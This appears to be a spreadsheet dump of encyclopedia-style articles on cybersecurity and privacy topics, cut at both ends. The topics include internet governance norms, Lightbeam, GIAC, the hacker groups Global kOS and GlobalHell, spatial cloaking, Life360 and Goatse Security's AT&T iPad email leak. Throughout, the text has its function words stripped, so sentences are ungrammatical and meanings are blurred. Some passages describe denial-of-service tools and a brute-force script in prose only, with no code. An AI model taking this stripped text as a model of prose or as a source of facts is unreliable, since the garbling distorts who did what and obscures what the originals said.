activities respond occur." other publications addition norm protect public core seven subsequent norms, gcsc published several documents. definition public core, norm applies early process defining norm protect public core effort divided working groups, one, principally diplomatic, specify actions precluded; other, involving subject-matter experts, specify infrastructures deemed worthy protection. this latter working group specified survey cybersecurity experts, delegated implementation survey packet clearing house, integrated results form definition public core, norm applies. this definition "public core internet" include packet routing forwarding, naming numbering systems, cryptographic mechanisms security identity, physical transmission media, more-specific details attending each, since used oecd others standardized description principal elements internet critical infrastructure. statement interpretation norm non-interference public core september 2021, gcsc released three-page statement responding, large part, russia's submission council working group international internet-related public policy issues, risk analysis existing internet governance operational model. statement reiterates gcsc's findings state actors primary threat internet stability, private actors; gcsc believes multistakeholder model internet governance maintaining internet stability, internet's critical infrastructure principally operated private sector. derivative work addition norms commission published, several organizations created efforts undertaken byproducts commission's work. cyberpeace institute notable derivative outcomes gcsc's work formation cyberpeace institute, headed gcsc commissioner marietje schaake europol veteran stéphane duguin. institute builds gcsc's work monitoring compliance norms coordinating cyber-attack forensic analytic efforts broaden public understanding norm violations. critical infrastructure assessment input definition public core, global survey internet infrastructure security experts conducted 2017 packet clearing house, headed gcsc commissioner bill woodcock. participants commissioners marina kaljurand (co-chair 2017-2018) latha reddy (co-chair 2017-2019) michael chertoff (co-chair 2019) motohiro tsuchiya joseph christopher painter ilya sachkov jeff moss khoo boon anriette esterhuysen xiadong abdul-hakeem ajijola virgilio almeida marietje schaake bill woodcock wolfgang kleinwächter scott charney elina noor isaac ben-israel jonathan zittrain nigel inkster jane holl lute samir saran former commissioners william saito wolff heintschel heinegg sigrid kaag hugo zylerberg research advisory group sean kanuck (chair) liis vihul (deputy chair law) marilia maciel (deputy chair internet governance) hugo zylberberg (deputy chair international peace security) koichiro komiyama (deputy chair technical information security) secretariat bruce mcconnell (eastwest institute) alexander klimburg (hague centre strategic studies) references external links official site commission final report commission definition "public core" internet report gcsc critical infrastructure assessment working group</t>
  </si>
  <si>
    <t>Lightbeam (software)</t>
  </si>
  <si>
    <t>lightbeam (called collusion experimental version) add-on firefox displays third party tracking cookies placed user's computer visiting various websites. displays graph interactions connections sites visited tracking sites provide information. functionality once installed enabled, lightbeam records tracking cookies saved user's computer firefox browser various sites user visits. differentiates "behavioural" tracking cookies (those record specific actions site) tracking cookies. time browsing session user open separate tab, using "show lightbeam" option tools, display graph sites visited cookies placed. this show given cookie used multiple sites, thus enabling sites track user site site. lightbeam also allow user advertisers third parties connected cookies, thus develop information user's browsing site site.mozilla emphasizes displays data real time.according mozilla, data collected lightbeam stored locally, shared anyone, unless user intentionally exports data shares manually. future versions include provisions reject delete tracking cookies well monitoring them. presentation gary kovacs, mozilla, presented collusion talk (technology, entertainment, design) early 2012."collusion allow pull back curtain provide users information growing role third parties, data drives experiences, ultimately little control experience loss data." kovacs wrote mozilla blog post talk. reactions writing extremetech, sebastian anthony found tracking connections revealed collusion "quite astonishing". went that: "now, either collusion shock appall yourself, show friends family rampant behavioral tracking once mother sees less five companies track behavior visits msnbc.com, visits foxnews.com, might little cautious.""ms smith" finds results collusion "jaw dropping".stephen webster, writing story wrote information provided collusion: "while doesn’t sound creepy, wait graph. brief test-run story revealed clicking number popular websites like comedy central, netflix, hulu, conan o’brien show, amazon, york times others three dozen organizations tracking movements across multiple websites." history plans collusion originally developed atul varma, mozilla engineer, independent project. later adopted mozilla project.mozilla announced would continuing development collusion support ford foundation 2012. however, beginning october 2019, ended official support favour built enhanced tracking protection firefox. notes</t>
  </si>
  <si>
    <t>Global Information Assurance Certification</t>
  </si>
  <si>
    <t>global information assurance certification (giac) information security certification entity specialises technical practical certification well research form giac gold program. sans institute founded certification entity 1999 term giac trademarked escal institute advanced technologies. giac provides vendor-neutral computer security certifications linked training courses provided sans. giac specific leading edge technological advancement security order keep ahead "black hat" techniques. papers written individuals pursuing giac certifications presented sans reading room giac's website. initially sans giac certifications required written paper "practical" specific area certification order achieve certification. april 2005, sans organization changed format certification breaking separate levels. "silver" level certification achieved upon completion multiple choice exam. "gold" level certification obtained completing research paper silver level prerequisite. january 2017, giac granted 89,827 certifications worldwide. sans giac certifications certifications listed 'unavailable' listed official sans giac sources, found elsewhere. they retired courses. cyber defense penetration testing management, audit, legal operations developer incident response forensics industrial control systems unobtainable certifications following certifications longer issued. external links official website notes</t>
  </si>
  <si>
    <t>Global kOS</t>
  </si>
  <si>
    <t>global ('kos' pronounced chaos) grey (leaning black hat) computer hacker group active 1996 2000, considered highly influential group involved multiple high-profile security breaches defacements well releasing notable network security intrusion tools. global involved media heavily interviewed profiled journalist newton blog titled road cyberspace" (otrics). group reported multiple times carolyn meinel attempted bring group justice members global openly mocked her. antonio based informant within group individually raided several members contact informant. overview global loose collective members hacking groups active 1996 released network security tools windows linux. group release exploit code groups did, member maintained webpage often acted individually original group. global continually reiterated goal entirely rampaging across internet creating much chaos could releasing automated denial service tools. group humorous irreverent interviews press releases, affiliates openly taunted webmasters website defacements. group's members hacked defaced large number websites nightly hacking contests efnet. releases yours! denial service tool digital destruction suite collection hacker tools panther modern denial service tool crack password cracking utilities battlepong flooding utility yours! yours! flagship release global early point click denial service tool helped spawn term 'script kiddie'. yours! first appeared 1996 updated versions released three times. yours! denial service tool used well-documented nizkor attack. believed hacker 'johnny xchaotic' 'angry johnny' used yours! take websites politicians, mtv, rush limbaugh klux klan multiple others. author claims came name yours! wanted hear rather national television.in print: klevinsky, laliberte, scott; gupta, ajay (2004). hack i.t.: security penetration testing. isbn 9780201719567., stephenson, peter; gilbert, keith (2000). investigating computer-related crime. isbn 9781420048872., wang, wally (2003). steal computer book tell internet. isbn 9781593270001. bosworth, seymour; kabay, (2002). computer security handbook. isbn 9780471269755. members membership global hacking groups time difficult determine members involved multiple groups, crossover appears global kos, technophoria, globalhell (gh). acidangel author denial service tools yours!' 'panther modern'. materva glitch assassin nachoman cracker raven author 'kos crack' shadow hunter silicon toad spidey that zaven digital affiliated members modify broncbuster banshee author bitchslap messiah deprave cyan kiss dvdman boss revelation references external links http://gkos.org http://web.textfiles.com/hacking/globlkos.nfo https://web.archive.org/web/19971015025943/http://www.otrics.com/hackr8.html</t>
  </si>
  <si>
    <t>Spatial cloaking</t>
  </si>
  <si>
    <t>spatial cloaking privacy mechanism used satisfy specific privacy requirements blurring users’ exact locations cloaked regions. this technique usually integrated applications various environments minimize disclosure private information users request location-based service. since database server receive accurate location information, including satisfying solution would sent back user. general privacy requirements include k-anonymity, maximum area, minimum area. background with emergence popularity location-based services, people getting personalized services, getting names locations nearby restaurants stations. receiving services requires users send positions either directly indirectly service provider. user's location information could shared 5000 times weeks. therefore, convenience also exposes users’ privacy certain risks, since attackers illegally identify users’ locations even exploit personal information. continuously tracking users' location identified technical issue, also privacy concern well. realized quasi-identifiers, refer information attributes, used re-identify user linked external information. example, social security number could used identify specific user adversaries, combined disclosure birth date, code, gender uniquely identify user. thus, multiple solutions proposed preserve enhance users’ privacy using location-based services. among proposed mechanisms, spatial cloaking widely accepted revised, thus integrated many practical applications. location privacy location privacy usually considered falling category information privacy, though little consensus definition location privacy. there often three aspects location information: identity, location (spatial information), time (temporal information). identity usually refers user's name, email address, characteristic makes user distinguishable. example, pokémon requires consistent user identity, since users required spatial information considered main approach determine location. temporal information separated real-time non-real time usually described time stamp place. link established them, location privacy considered violated. accessing personal location data raised severe privacy concern, even personal permission. therefore, privacy-aware management location information identified essential challenge, designed provide privacy protection abuse location information. overall idea preserving location privacy introduce enough noise quantization reduce chances successful attacks.spatial crowdsourcing uses devices (global positioning system) collects information. data retrieved includes location data used analyze maps local spatial characteristics. recent years, researchers making connection social aspects technological aspects regarding location information. example, co-location information considered data potential attackers would take consideration, location privacy decreased 60%. also, constant report user's location information, movement profile could constructed specific user based statistical analysis, large amount information could exploited generated profile user's office location, medical records, financial status, political views. therefore, researchers taken account social influence algorithms, since socially networked information accessible public might used potential attackers. history order meet user's requirements location privacy process data transportation, researchers exploring investigating models address disclosure private information.the secure-multi-party model constructed based idea sharing accurate information among parties. each party access particular segment precise information time prevented acquiring shares data. however, computation problem introduced process, since large amount data processing required satisfy requirement.the minimal information sharing model introduced cryptographic techniques perform join intersection operations. however, inflexibility model queries makes hard satisfying practical applications.the untrusted third-party model adopted peer-to-peer environments.the popular model right trusted third-party model. some practical applications already adopted idea trusted third party services preserve privacy. example, anonymizer integrated various websites, could give anonymous surfing service users. also, purchasing paypal, users required provide credit card information. therefore, introducing trusted-third-party, users’ private information directly exposed service providers. approaches preserving location information promising approach preserving location privacy report data users' behavior time protect identity location privacy. several methods investigated enhance performances location-preserving techniques, location perturbation report landmark objects. location perturbation idea location perturbation replace exact location information coarser grained spatial range, thus uncertainty would introduced adversaries match user either known location identity external observation location identity. location perturbation usually satisfied using spatial cloaking, temporal cloaking, location obfuscation. spatial temporal cloaking refers wrong imprecise location time reported service providers, instead exact information. example, location privacy could enhanced increasing time location reports, since higher report frequencies makes reidentification possible happen data mining. there cases report location information delayed visit users identified region.however, approach could affect service reported service providers since data received accurate. accuracy timelessness issues usually discussed approach. also, attacks recognized based idea cloaking break user privacy. landmark objects based idea landmark objects, particular landmark significant object reported service provider, instead region. avoid location tracking order avoid location tracking, usually less location information would reported service provider. example, requesting weather, code instead tracked location would accurate enough quality service received. environment centralized scheme centralized scheme constructed based central location anonymizer (anonymizing server) considered intermediate user service provider. generally, responsibilities location anonymizer include tracking users' exact location, blurring user specific location information cloaked areas communicate service provider. example, methods achieve replacing correct network addresses fake-ids information forward service provider. sometimes user identity hidden, still allowing service provider authenticate user possibly charge user service. these steps usually achieved spatial cloaking path confusion. except cases correct location information sent high service quality, exact location information temporal information usually modified preserve user privacy.serving intermediate user location-based server, location anonymizer generally conducts following activities: receiving users’ exact location information private profile blurring location cloaked areas based specific privacy requirements times, removing user identities location information reporting cloaked area service provider receiving list solutions, referred candidate list, service provider satisfies user's requests deciding appropriate solution based user's exact location returning accurate solution information back user some location anonymizer adopt step)the location anonymizer could also considered trusted-third party since trusted user accurate location information private profile stored location anonymizer. however, could also expose users’ privacy great risks time. first, since anonymizer keeps tracking users' information access users’ exact location profile information, usually target attackers thus higher risks second, extent users trust location anonymizers could essential. fully trusted third party integrated algorithm, user location information would reported continuously location anonymizer, cause privacy issues anonymizer compromised. third, location anonymizer lead performance bottleneck large number requests presented required cloaked. this location anonymizer responsible maintaining number users region order provide acceptable level service quality. distributed scheme (decentralized scheme) distributed environment, users anonymize location information fixed communication infrastructures, base stations. usually, certification server introduced distributed scheme users registered. before participating system, users required obtain certificate means trusted. therefore, every time user request location-based service exact location information forward server, auxiliary users registered system collaborate hide precise location user. number assistant users involved cloaking region based k-anonymity, usually specific user. cases enough users nearby, s-proximity generally adopted generate high number paired user identities location information actual user indistinguishable specific area. profiles location information sent service provider sometimes also referred dummies.however, complexity data structure used anonymize location could result difficulties applying mechanism highly dynamic location-based mobile applications. also, issue large computation communication posed environment. peer-to-peer environment peer-to-peer (p2p) environment relies direct communication information exchange devices community users could communicate multi-hop routing without fixed communication infrastructures. environment aims extend scope cellular coverage sparse environment. environment, peers trust work together, since location information would reported cloaked area constructed achieve desired k-anonymity requesting location-based services.researchers discussing privacy requirements security requirements would make privacy-preserving techniques appropriate peer-to-peer environment. example, authentication authorization required secure identify user thus making authorized users distinguishable unauthorized users. confidentiality integrity make sure authorized access data transmitted peers, transmitted information cannot modified.some drawbacks identified peer-to-peer environment communication costs, enough users threats potential malicious users hiding community. mobile environments mobile devices considered essential tool communication, mobile computing thus become research interest recent years. from online purchase online banking, mobile devices frequently connected service providers online activities, time sending receiving information. generally, mobile users receive personal services anywhere time location-based services. mobile devices, global positioning system (gps) commonly used component provide location information. besides that, global system mobile communications (gsm) wifi signals could also help estimating locations. there generally types privacy concerns mobile environments, data privacy contextual privacy. usually, location privacy identity privacy included discussion contextual privacy mobile environment, data transferred various mobile devices discussed data privacy. process requesting location-based services exchanging location data, quality data transferred safety information exchanged could potentially exposed malicious people. privacy requirements matter specific privacy-preserving solution integrated cloak particular region service requester stays. usually constructed several angles satisfy different privacy requirements better. these standards either adjusted users decided application designers. some privacy parameters include k-anonymity, entropy, minimum area, maximum area. k-anonymity concept k-anonymity first introduced relational data privacy guarantee usefulness data privacy users, data holders want release data. k-anonymity usually refers requirement information user indistinguishable minimum {\displaystyle k-1} people region, real number. thus, disclosed location scope would expected keep expanding {\displaystyle users could identified region {\displaystyle people form anonymity set. usually, higher k-anonymity, stricter requirements, higher level anonymity. k-anonymity satisfied, possibility identifying exact user would around {\displaystyle 1/k} subjects different algorithms, therefore location privacy would effectively preserved. usually, cloaking region designed significant algorithm constructed, chances identifying exact service requester would much lower even though precise location user exposed service providers, alone attackers' abilities complex machine learning advanced analysis techniques. some approaches also discussed introduce ambiguity system, historical k-anonymity, p-sensitivity, l-diversity. idea historical k-anonymity proposed guarantee moving objects making sure least {\displaystyle k-1} users share historical requests, requires anonymizer track current movement user also sequence location user. therefore, even user's historical location points disclosed, adversaries could distinguish specific user group potential users. p-sensitivity used ensure critical attributes identity information least {\displaystyle different values within {\displaystyle users. moreover, l-diversity aims guarantee user unidentifiable different physical locations.however, setting large value would also requires additional spatial temporal cloaking leads resolution information, turn could lead degraded quality service. minimum area size minimum area size refers smallest region expanded exact location point satisfies specific privacy requirements. usually, higher privacy requirements, bigger area required increase complicity distinguishing exact location users. also, idea minimum area particularly important dense areas k-anonymity might efficient provide guaranteed privacy-preserving performance. example, requestor shopping mall promising discount, might people around her, thus could considered dense environment. under situation, large k-anonymity l=100 would correspond small region, since require large area include people near user. this might result inefficient cloaked area since space user could potentially reside smaller compared situation level k-anonymity, people scattered other. maximum area size since tradeoff relationship quality service privacy requirements location-based services, sometimes maximum area size also required. this sizable cloaked area might introduce much inaccuracy service received user, since increasing reported cloaked area also increases possible satisfying results user's request. these solutions would match specific requirements user, necessarily applicable users’ exact location. applications cloaked region generated method spatial cloaking could multiple environments, snapshot location, continuous location, spatial networks, wireless sensor networks. sometimes, algorithms generate cloaked area designed various frameworks without changing original coordinate. fact, specification algorithms well-establishment generally adopted mechanisms, privacy-preserving techniques designed specifically desired environment different privacy requirements better. geosocial applications geosocial applications generally designed provide social interaction based location information. some services include collaborative network services games, discount coupons, local friend recommendation dining shopping, social rendezvous. example, motion based allows users share exercise path others. foursquare earliest location-based applications enable location sharing among friends. moreover, scvngr location-based platform users could earn points going places.despite privacy requirements k-anonymity, maximum area size, minimum area size, requirements regarding privacy preserved geosocial applications. example, location user unlinkability require service provider able identify user conducts request twice correspondence given cloaked area real-time location. also, location data privacy requires service provider access content data specific location. example, mainly designed satisfy privacy requirements geosocial applications. location-based services with popularity development global positioning system (gps) wireless communication, location-based information services high growth recent years. already developed deployed academia practical sphere. many practical applications integrated idea techniques location-based services, mobile social networks, finding places interest (poi), augmented reality (ar) games, awareness location-based advertising, transportation service, location tracking, location-aware services. these services usually require service providers analyze received location information based algorithms database come optimum solution, report back requesting user. usually, location-based services requested either snapshot queries continuous queries. snapshot queries generally require report exact location specific time, “where nearest station?” continuous queries need tracking location period time, “constantly reporting nearby stations.”with advancement global positioning systems development wireless communication introduced extensive location-based applications, high risks placed user privacy. both service providers users dangers attacked information abused. reported devices used exploit personal information stalk personal locations. sometimes, reporting location information would already indicate much private information. attacks specific location-based services space time correlated inference attacks, visited location correlated particular time, could lead disclosure private life private business.some popular location-based services include: location-aware emergency service location-based advertisement live traffic report location-based store finders navigation systemcontinuous location-based service continuous location-based services require constant report location information service providers. during process requesting continuous location-based service, pressure recognized privacy leakage issues. since series cloaked areas reported, advancing technological performances, correlation could generated blurred regions. therefore, many types research conducted addressing location privacy issues continuous location-based services.snapshot location-based services while snapshot location generally refers linear relation specific location point point temporal coordinate. some mechanisms proposed either address privacy-preserving issues environments simultaneously concentrate fulfilling privacy requirement respectively. example, privacy grid called dynamic grid system proposed snapshot continuous location-based service environments. other privacy mechanisms existing privacy solutions generally fall categories: data privacy context privacy. besides addressing issues location privacy, mechanisms might applied scenarios. example, tools cryptography, anonymity, obfuscation caching proposed, discussed, tested better preserve user privacy. these mechanisms usually solve location privacy issues different angles thus different situations. cryptography anonymity obfuscation caching pseudonymous technique concerns even though effectiveness spatial cloaking widely accepted idea spatial cloaking integrated multiple designs, still concerns towards first, schemes spatial cloaking limitations. example, centralized scheme, although users' private information including identity cloaked, location would able release sensitive information, especially specific user requests service multiple times pseudonym. decentralized scheme, issues large computation enough peers region. second, ability attackers requires in-depth consideration investigation according advancement technology machine learning connection social relations, particularly share information online. third, credibility trusted-third-party also identified issues. there large number software published markets every day, undergone strict examination. software bugs, configuration errors trusted-third-party malicious administrators could expose private user data high risks. based study 2010, two-thirds trusted-third-party applications android market considered suspicious towards sensitive information.fourth, location privacy recognized personalized requirement sensitive various contexts. customizing privacy parameters exploring recent years since different people different expectations amount privacy preserved sometimes default settings fully satisfy user needs. considering often trade-off relation privacy personalization personalization usually leads better service, people would different preferences. situations users change default configurations, accepting default instead customizing seems popular choice. also, people's attitudes towards disclosing location information could vary based service's usefulness, privacy safeguards, disclosed quantity etc. situations, people weighing price privacy sharing benefits received.fifth, many protection mechanism proposed literature practically integrated commercial applications. since little analysis regarding implementation location privacy-preserving mechanisms, still large theory privacy. attack during process exchanging data, three main parties—the user, server, networks—can attacked adversaries. knowledge held adversaries could used carry location attacks includes observed location information, precise location information, context knowledge. techniques machine learning data also emerging trend location privacy, popularity smart devices increasing number attacks. some adopted approaches include virus, trojan applications, several cyber-attacks. man-in-the-middle attackman-in-the-middle attacks usually occur mobile environment assumes information going transferring process user service provider could attacks might manipulated attackers revealing personal information. cross-service attackcross-servicing attacks usually take place users using poorly protected wireless connectivity, especially public places. video-based attackvideo-based attacks prevalent mobile devices usually bluetooth, camera, video capacities, since malicious software applications secretly recording users’ behavior data reporting information remote device. stealthy video capture intentionally designed applications spies unconscious user report information. sensor sniffing attacksensor sniffing attacks usually refer cases intentionally designed applications installed device. under situation, even adversaries physical contact mobile device, users’ personal information would still risks disclosed. context linking attackin localization attack, contextual knowledge combined observed location information disclose precise location. contextual knowledge also combined precise location information carry identity attacks. machine/deep learning attackintegrating learning algorithms deep learning methods posing huge challenge location privacy, along massive amount data online. example, current deep learning methods come predictions geolocations based personal photos social networks performs types object detection based abilities analyze millions photos videos. regulations policies policy approaches also discussed recent years intend revise relevant guidelines propose regulations better manage location-based service applications. current technology state sufficiently aligned policies legal environment, efforts academia industry trying address issue. uniformly accepted well- established requirements users' awareness location privacy policies specific service consents sending personal location service provider. besides approaches, researchers also focusing guarding markets, since insecure market would expose unaware users several privacy risks. example, identified much malware android market, designed carry cyber attacks android devices. without effective clear guidelines regulate location information, would generate ethical lawful problems. therefore, many guidelines discussed years recently, monitor location information. european data protection guideline european data protection guideline recently revised include specify privacy individual's data personally identifiable information (piis). these adjustments intend make safe effective service environment. specifically, location privacy enhanced making sure users fully aware consented location information would sent service providers. another important adjustment complete responsibility would given service providers users’ private information processed. european union's directive european union's directive 95/46/ec protection individuals regard processing personal data free movement data specifies limited data transfer non-eu countries adequate level privacy protection". notion explicit consent also introduced directive, stated except legal contractual purpose, personal data might processed user unambiguously given consent.european union's directive 2002/58/ec privacy electronic communication explicitly defines location information, user consent requirements corporate disposal requirement helps regulate protect european citizens' location privacy. under situation data unlinkable user, legal frameworks directive restriction collection anonymous data. electronic communications privacy 1986 electronic communications privacy discusses legal framework privacy protection gives standards enforcement access electronic records communications. also influential deciding electronic surveillance issues. global system mobile communication association (gsma) gsma published privacy guideline, mobile companies europe signed started implement users would better understanding information recorded analyzed using location-based services. also, gsma recommended operating companies inform customers people access users’ private information. cases corporate examples even though many privacy preserving mechanisms integrated common effectiveness, efficiency, practicality, location-based service providers started address privacy issues applications. example, twitter enables users customize location accuracy. locations posted glympse automatically expire. also, socialradar allows users choose anonymous invisible using application. google stated google meet european union’s data privacy thus increasing attention placed advocation guidelines policies regarding data privacy. facebook arguing less week facebook uses “places” feature, content location information exploited thieves used conduct home invasion. court cases united states knotts case case, police used beeper keep track suspect's vehicle. after using beeper alone track suspect, officers secured search warrant confirmed suspect producing illicit drugs van. suspect tried suppress evidence based tracking device used monitoring process, court denied this. court concluded person traveling automobile public thouroughfare [sic] reasonable expectation privacy movement place another.” nevertheless, court reserved discussion whether twenty-four-hour surveillance would constitute search.however, cases using tracking devices different case, since tracking conducted without human interaction, beeper considered method increase police's sensory perception maintaining visual contact suspect. police presence required using beepers needed using conduct surveillance. therefore, enforcement agents required secure warrant obtaining vehicle's location information tracking devices. united states jones case (https://www.oyez.org/cases/2011/10-1259), police search warrant install global positioning system respondent wife's car, actual installation 11th maryland, instead authorized installation district beyond approved days. district court ruled data recorded public roads admissible since respondent jones reasonable exception privacy public streets, d.c. circuit reversed violation fourth amendment unwarranted device. practical applications popular culture george orwell's novel 1984, world everyone watched depicted, practically time places. brønnøysund register center(https://www.brreg.no) norway provides free public register service, people register specify want receive direct marketing, sale phone calls mails. also location obfuscation location-based service public cryptography spoofing attack mobile phone tracking ubiquitous computing cloaking device references</t>
  </si>
  <si>
    <t>Light-weight Identity</t>
  </si>
  <si>
    <t>light-weight identity (lid), light identity management (lidm) identity management system online digital identities developed part netmesh. first published early 2005, original url-based identity system, later followed openid. uses urls verification user's identity, makes several open-source protocols openid, yadis, pgp/gpg. also digital identity online identity online identity management saml-based products services</t>
  </si>
  <si>
    <t>GlobalHell</t>
  </si>
  <si>
    <t>globalhell group hackers, composed individuals. group disbanded 1999, members prosecuted computer intrusion lesser offences. members group responsible hundred website defacements, trafficking stolen personal financial information illegally accessing numerous teleconferences co-ordinated efforts. systems broke include united states army, white house, united states cellular, ameritech postal service. members mosthated sentenced months' imprisonment three years' supervised release. mindphasr ordered restitution u.s. army serve months prison, followed three years supervised release gain approval future employers internet. ne0h ne0h canadian hacker, featured kevin mitnick's book, "the intrusion", ne0h's real identity unknown. references external links wired.com news article globalhell. zdnet news article related disbandment</t>
  </si>
  <si>
    <t>GlobalVision</t>
  </si>
  <si>
    <t>globalvision saas software company specializing packaging labelling. history global vision inc. (globalvision) founded 1990 reuben malz. headquartered montreal, canada, regional offices germany.in 2013 pfizer contracted globalvision packaging quality control.globalvision introduced first web-based quality control platform, qcanywhere, 2013. this followed introduction advanced version platform, proofware, 2014.in 2017, globalvision released desktop quality control platform.in 2018, globalvision partnered pantone x-rite launch world’s first digital color inspection system print packaging. references</t>
  </si>
  <si>
    <t>Life360</t>
  </si>
  <si>
    <t>life360 inc. francisco, california–based american information technology company provides location-based services, including sharing notifications, consumers globally. main service called life360, family social networking released 2008. location-based service designed primarily enable friends family members share location other. history life360 founded chris hulls alex haro received total million funding since launch, including funding facebook google. initially released 2008 android marketplace. first funding life360 came form $275,000 grant winner google's 2008 android developer challenge. additional funding included $5.5 million series round, million series round, million series round. before going public, company secured total investors including regal funds management, sunstone management, several others.life360 entered agreement 2013 integrate location services life360 navigation automobiles. year, life360 surpassed foursquare number registered users million reached million registered users year. life360 also increase user registration following announcement google would shutting google latitude platform august 2013.it announced 2013 life360 would adding global support would include support languages english international sms. announcement came downloads life360 increased internationally, even though available english.in 2016, life360 added feature enables smartphones detect people crash automatically contacts emergency response. february 2016, life360 acquired private messaging application combinator grad "couple" based mountain view, california.at january 2018, announced partnership life360. connects protects families outside home, utilizing adt's expansive security infrastructure.in 2019, life360 listed australian securities exchange (asx) ticker "360", raising proceeds totaling au$145.4 million. majority funds raised used grow business globally develop home insurance home security products well auto insurance sold directly service customers.in november 2019, company acquired zenscreen, jose, california-based guides users families track attain screen time habits balanced digital diet, undisclosed sum. december 2019, life360 surpassed million monthly active users (maus).in november 2021, life360 agreed acquire tile $205 million acquisition, expected integrate services, expanding tile's tracking reach tenfold. features life360 mobile application referred "family-oriented private social network" bloomberg businessweek. social network families differentiates based around peer groups professional networks find friends linkedin. allows users share locations, group message, call roadside assistance. four main features: location sharing, circles, places, premium. location sharing main feature location sharing. users open members instantly. users choose share location particular circle particular time. circles circles app's newest feature, released september 2013. circles allows users create separate groups within app, e.g. "caregivers", "extended family", "john's baseball team." users' location visible also circle, members "caregivers" cannot location users "extended family", unless also circle. places life360 allows users create geofences alert another enters leaves another location. premium life360 operates freemium app, users extra features. these extra features include: stolen phone insurance, access live advisor 24/7, unlimited creation "places", emergency roadside assistance (known 'driver protect'). bubbles ceo, chris hulls, created tiktok account initiate dialogue teenagers intense criticism. subsequently, life360 released bubbles allows users radius miles time frame hours. this means able people bubbles however safety features messaging features remain active. criticism article washington post claims parents using location sharing feature track teenage adult children ways resemble emotional abuse."an article markup reported life360 sells users’ precise location data data brokers. according life360’s privacy policy, data “does reasonably identify directly”. company later claimed longer selling type data. awards recognition life360 received multiple awards including funding winner google android developer challenge facebook fbfund. received people's voice award best location technology 2012 webby awards. year received reader's choice award about.com coolest parenting teens gadget winner. references external links official website</t>
  </si>
  <si>
    <t>Libreswan</t>
  </si>
  <si>
    <t>libreswan fork openswan ipsec implementation. libreswan created almost openswan developers lawsuit ownership openswan name filed paul wouters, release manager openswan, december 2012. lawsuit later settled court. libreswan supports common type ipsec configurations people including configuration like host host vpn, subnet subnet vpn. also strongswan external links official website references</t>
  </si>
  <si>
    <t>Sparrowiq</t>
  </si>
  <si>
    <t>sparrowiq packet-based traffic analysis network performance monitoring solution provides network managers near real-time traffic visibility network usage based conversations, applications, users class service.the product developed solana networks (ottawa, ontario, canada) allow smaller businesses gain access flow-based network traffic monitoring solutions normally complex unaffordable. sparrowiq awarded "best product" ascii group june 2015 "strong value" award enterprise management associates 2013. features sparrowiq features traffic forensics identifying business-relevant versus recreational unauthorized traffic real-time traffic alerting instant notification bandwidth crosses preset thresholds automatic report generation distribution references</t>
  </si>
  <si>
    <t>Library makerspace</t>
  </si>
  <si>
    <t>library makerspace, also named hackerspace hacklab, area and/or service offers library patrons opportunity create intellectual physical materials using resources computers, printers, audio video capture editing tools, traditional arts crafts supplies. field library science, makerspaces classified type library service offered librarians patrons. definition library makerspace maker program, patrons varying ages work together, alone, library staff creative projects. these spaces often give community members access tools, technology, social connections easily accessible otherwise. goal makerspace allow patrons learn direct experimentation other. library makerspaces require specified areas; pre-existing space temporarily modified "made") better suit needs participants. intentions makers qualities space itself. history force behind initial “maker movement” believed creation make: magazine 2005, published information maker-related projects. momentum grew magazine devised series venues makers express share creations deemed “maker faires”. libraries took notice began offering programs redesigning spaces address related interests within communities. first public library maker space fayetteville free library. purposes library makerspace intended allow community members experience technology activities previously able access. many maker spaces include technology like printers, sewing machines, soldering irons, coding, robotics, wood carving machines, patrons invited experiment freely. purpose maker space often expressed inspiring interest science, technology, design, lifelong learning people served library. over time, expected available activities within individual maker space grow reflect interests community library housed. makerspaces also intended allow minorities underrepresented populations, like women, people disabilities, become involved technology fields previously considered. extent activities services makerspace essentially determined target audience, funds available objectives host institution. types activities technology there many types makerspaces offered library service. they usually developed around certain type medium, technology, even patron group. some examples include computer programming coding, cryptoparties, digital privacy workshops, free software advocacy, robotics electronics, modeling printing, laser cutting, board games, traditional arts crafts. although experts area available, community atmosphere space allows patrons learn experiment rather receive lessons.maker spaces also grown allow patrons take classes develop certain skill, like cooking, sewing yoga. criticism when concept makerspaces libraries first introduced early 2010s, anticipated librarians would feel reluctant allocate resources away services could issues legal liability consider. resources exist assist libraries making decisions liability waivers safety forms addition potential legal concerns. also tool library hackerspace references further reading mello, maggie; nichols, jennifer, eds. (2020). re-making library makerspace: critical theories, reflections, practices. sacramento: library juice press. isbn 978-1-63400-081-9. mersand, shannon (2021). "the state makerspace research: review literature". techtrends. (2): 174–186. doi:10.1007/s11528-020-00566-5. s2cid 229463223. external links links library resources</t>
  </si>
  <si>
    <t>GoAccess</t>
  </si>
  <si>
    <t>goaccess open-source analytics application unix-like operating systems. application text-based application user interface. goaccess provide real-time analytics continuously monitoring server logs. also list analytics software references external links official website website statistics</t>
  </si>
  <si>
    <t>Goatse Security</t>
  </si>
  <si>
    <t>goatse security (goatsec) loose-knit, nine-person grey hacker group specialized uncovering security flaws. division anti-blogging internet trolling organization known nigger association america (gnaa). group derives name goatse.cx shock site, chose "gaping holes exposed" slogan. website abandoned without update since 2014.in june 2010, goatse security obtained email addresses approximately 114,000 apple ipad users. this investigation filing criminal charges group's members. founding gnaa several security researchers within membership. according goatse security spokesperson leon kaiser, gnaa could fully utilize talents since group believed would anyone would take security data published gnaa seriously. order create medium gnaa members publish security findings, gnaa created goatse security december 2009. discovery browser vulnerabilities order protect browser inter-protocol exploitation, mozilla blocked several ports html forms would normally access january 2010, gnaa discovered mozilla's blocks cover port 6667, left mozilla browsers vulnerable cross-protocol scripts. gnaa crafted javascript-based exploit order flood channels. although efnet oftc able block attacks, freenode struggled counteract attacks. goatse security exposed vulnerability, members, andrew auernheimer, "weev," posted information exploit encyclopedia dramatica.in march 2010, goatse security discovered integer overflow vulnerability within apple's browser, safari, posted exploit encyclopedia dramatica. they found person could access blocked port adding 65,536 port number. this vulnerability also found arora, icab, omniweb, stainless. although apple fixed glitch desktop versions safari march, company left glitch unfixed mobile versions browser. goatse security claimed hacker could exploit mobile safari flaw order gain access cause harm apple ipad. at&amp;t/ipad email address leak june 2010, goatse security uncovered vulnerability within at&amp;t website. at&amp;t provider service apple's ipad united states time. when signing at&amp;t's service ipad, at&amp;t retrieves icc-id ipad's card associates email address provided sign-up. order ease log-in process ipad, at&amp;t website receives card's icc-id pre-populates email address field address provided sign-up. goatse security realized sending http request valid icc-id embedded inside at&amp;t website, website would reveal email address associated icc-id.on june 2010, daniel spitler, "jacksonbrown", began discussing vulnerability possible ways exploit including phishing, channel. goatse security constructed php-based brute force script would send http requests random icc-ids at&amp;t website legitimate icc-id entered, would return email address corresponding icc-id. this script dubbed "ipad account slurper."goatse security attempted find appropriate news source disclose leaked information, auernheimer attempting contact news corporation thomson reuters executives, including arthur siskind, at&amp;t's security 